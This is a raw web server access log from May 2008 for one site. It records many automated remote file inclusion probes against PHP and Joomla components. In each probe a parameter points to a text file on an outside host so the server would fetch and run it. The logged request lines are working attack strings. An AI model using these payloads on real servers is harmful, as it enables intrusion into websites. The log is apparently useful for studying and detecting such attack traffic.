210.109.102.108 - - [05/May/2008:09:25:01 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.102.108 - - [05/May/2008:09:25:01 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.102.108 - - [05/May/2008:09:25:02 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.68.157 - - [05/May/2008:09:25:04 -0700] "GET /logs/access_080219.log//mcf.php?content=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:25:14 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.209.247.35 - - [05/May/2008:09:25:31 -0700] "GET //amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:09:25:34 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:09:25:34 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:09:25:34 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:25:36 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.36.154.122 - - [05/May/2008:09:25:40 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.154.122 - - [05/May/2008:09:25:40 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.154.122 - - [05/May/2008:09:25:40 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.154.122 - - [05/May/2008:09:25:42 -0700] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:09:25:47 -0700] "GET /logs/access_071228.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.238.225.165 - - [05/May/2008:09:25:51 -0700] "GET /logs/access_080213.log/index.php?configFile=http://www.loichua.org/.debug/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [05/May/2008:09:25:56 -0700] "GET /logs/index.php?configFile=http://www.loichua.org/.debug/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [05/May/2008:09:25:57 -0700] "GET /index.php?configFile=http://www.loichua.org/.debug/id1.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:26:03 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:09:26:04 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.26.137.64 - - [05/May/2008:09:26:12 -0700] "GET /logs/access_080218.log/claroline/inc/claro_init_header.inc.php?includePath=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
200.80.42.159 - - [05/May/2008:09:26:20 -0700] "GET /logs/tiny_includes/config.php?dir_ws=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [05/May/2008:09:26:21 -0700] "GET /tiny_includes/config.php?dir_ws=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:26:39 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.6.24.163 - - [05/May/2008:09:26:41 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.51.177 - - [05/May/2008:09:26:42 -0700] "GET /blog/index.php/2008/04/12/great-day-for-a-ride/feed/ HTTP/1.0" 304 1 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
64.7.108.234 - - [05/May/2008:09:26:58 -0700] "GET //admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.lapuntastudios.com/meser/administrator/components/com_joomla-visites/core/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.7.108.234 - - [05/May/2008:09:26:58 -0700] "GET /logs//admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.lapuntastudios.com/meser/administrator/components/com_joomla-visites/core/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.30.73.117 - - [05/May/2008:09:27:10 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.30.73.117 - - [05/May/2008:09:27:10 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:09:27:11 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:09:27:11 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:09:27:12 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.225.216.227 - - [05/May/2008:09:27:20 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:09:27:25 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.238.225.165 - - [05/May/2008:09:27:30 -0700] "GET /logs/access_080321.log/index.php?configFile=http://www.loichua.org/.debug/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.154.122 - - [05/May/2008:09:27:53 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.154.122 - - [05/May/2008:09:27:53 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.154.122 - - [05/May/2008:09:27:53 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:09:28:00 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:09:28:00 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:09:28:00 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:09:28:20 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:09:28:20 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:09:28:21 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:09:28:26 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:09:28:26 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:09:28:27 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:09:28:46 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.109.102.108 - - [05/May/2008:09:28:51 -0700] "GET /logs/access_080214.log//newspublish/include.php?path%5Bdocroot%5D=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:09:29:04 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.16.29.227 - - [05/May/2008:09:29:05 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.29.227 - - [05/May/2008:09:29:06 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.29.227 - - [05/May/2008:09:29:06 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:29:13 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.interestudio.com/loja//skins/spre.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:29:13 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.interestudio.com/loja//skins/spre.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:29:13 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:29:13 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:09:29:15 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:09:29:15 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:09:29:15 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.216.227 - - [05/May/2008:09:29:23 -0700] "GET /logs/access_080312.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.195.52.115 - - [05/May/2008:09:29:25 -0700] "GET /blog/index.php/2008/ HTTP/1.0" 200 10613 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
96.52.36.19 - - [05/May/2008:09:29:35 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.16.29.227 - - [05/May/2008:09:29:36 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.29.227 - - [05/May/2008:09:29:37 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.29.227 - - [05/May/2008:09:29:37 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.154.122 - - [05/May/2008:09:29:52 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.48.10.14 - - [05/May/2008:09:29:58 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [05/May/2008:09:30:03 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.29.227 - - [05/May/2008:09:30:04 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:30:07 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:30:08 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:30:08 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.26.137.64 - - [05/May/2008:09:30:14 -0700] "GET /logs/access_080321.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [05/May/2008:09:30:15 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [05/May/2008:09:30:15 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
61.63.9.163 - - [05/May/2008:09:30:21 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:30:26 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:30:27 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:30:27 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.213.123 - - [05/May/2008:09:30:34 -0700] "GET /logs/access_080309.log//sitemap.xml//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [05/May/2008:09:30:35 -0700] "GET //sitemap.xml//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:09:30:35 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:09:30:35 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.123 - - [05/May/2008:09:30:35 -0700] "GET /logs//sitemap.xml//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:09:30:36 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:09:30:36 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:09:30:37 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:09:30:37 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:09:31:09 -0700] "GET /logs/access_071228.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:09:31:09 -0700] "GET /logs/access_071228.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.187 - - [05/May/2008:09:31:26 -0700] "GET /?D=A HTTP/1.0" 200 11590 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:09:32:22 -0700] "GET /logs/access_080324.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:32:24 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:32:30 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:32:30 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:32:33 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:32:33 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:32:37 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:32:37 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:32:43 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:32:55 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:09:32:57 -0700] "GET /logs/access.log/index.php?pag=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:32:59 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:33:01 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:33:04 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
67.19.51.194 - - [05/May/2008:09:33:04 -0700] "GET /logs/access.log/index.php?pag=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:33:08 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
61.63.9.163 - - [05/May/2008:09:33:15 -0700] "GET /logs/access_080228.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:09:33:15 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:09:33:15 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.63.9.163 - - [05/May/2008:09:33:19 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:33:48 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:33:51 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:33:52 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
